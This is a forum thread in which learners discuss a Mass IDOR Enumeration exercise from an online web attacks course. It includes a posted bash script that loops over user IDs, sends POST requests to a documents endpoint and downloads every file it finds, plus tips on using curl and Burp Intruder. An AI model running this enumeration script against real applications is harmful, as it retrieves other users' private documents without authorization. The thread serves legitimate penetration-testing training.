Hello, I am going through the web attacks module. In the Mass IDOR Enumeration section I have a question. The entire section is talking about uid and enumerating them.
So my question is am I just missing something here? Or is there something wrong with the target being spawned? I did find an API I can enumerate but I don’t see any flag file anywhere and again there are 0 uids anywhere in the web app.
Ahh I see. I mean, obviously I did not do it right but I used the bash script, the intruder, etc and everything else they talked about but nothing. It’s just weird how they do that so much, talk about one thing and then do something COMPLETELY different. Don’t get me wrong, I love it, it’s just weird.
I believe the idea is to make us think outside the box. In real life Pentests you have to do a lot of independent research and outside thinking. I have noticed the pattern in the Academy, they intentionally leave things out to make you look at in at a different angle. I know how that goes, I have spent days on some of these modules. Glad you got it!
So clicking the Documents link would not work for me if I used Firefox instead of Burp’s internal browser.
Once I used the internal browser, clicking http://SERVER:PORT/Documents worked, and I could see the POST request in Burp.
When I modified the script from the module to find extensions other than just .pdf and to curl POST requests (instead of the GET request in the example), I struggled to get the wget to download non-pdf files.
So I replaced the wget -q $url/$link with curl -O $url/$link, which seemed to work.
Was far more difficult than I anticipated. Is there an easier way that I’m missing?
Here is my final script, but give it a go yourself before revealing it!!
#!/bin/bash
url="http://SERVER:PORT/"
for i in {1..20}; do
for link in $(curl -s -X POST -d "uid=$i" "$url/documents.php" | grep -oP "\/documents.*?\\.\\w+"); do
curl -O $url/$link
done
done
Although, I support your claim, riddling and reinstructing are not the same. Thus, the frustration everyone feels is extremely justifiable for a subscription-based learning platform that promotes the former. It does not benefit students to force them to rethink and develop poor study habits.
Or, the creators simply cannot properly instruct nor reinstruct payees without riddling in a childlike manner. Directly asking tough questions with the intent being to research on specific topics prior to responding would be more conducive if it actually counted towards the cube-collecting interactive modular work and could have benefital results come of it for those who are skills building for a career in Information Technology, Cybersecurity, Pentesting etc.
I had a hard time finding the flag from the examples on this forum. I did notice the downloaded pdf file was a MD5 hash of 1 and the get document script referenced 1 so I took the long way and incremented 1 to 20 until I found the flag.
To all those who feel stuck in this and other ctfs, my piece of advice is not to make my mistake of wanting to finish the ctf quickly or when very tired. I approached this very ctf after a long day of work (I am a QA engineer), I was very tired and though I read both the text of the module and this thread many, many times, I was not able to understand anything about how to complete this ctf, even if the advice given in this thread is self-explanatory. Then I decided to stop and clear my mind during the morning and early evening of the following day, by forcing myself not to think of this ctf at all. When I went back to the ctf half an hour ago, I immediately understood the mistakes I was making the day before and how to solve it.
The scripts did not work for me. I managed to complete Mass IDOR enumeration and Bypassing Encoded Characters without scripts using only burp Intruder.
IF like me YOU GET HERE after you have been looking around the internet for an answer, you have found some script and it still doesnt’t work; swap your wget command for curl -O $url/$link . No need for burp or zap etc, just bash and curl . DM me if you get stuck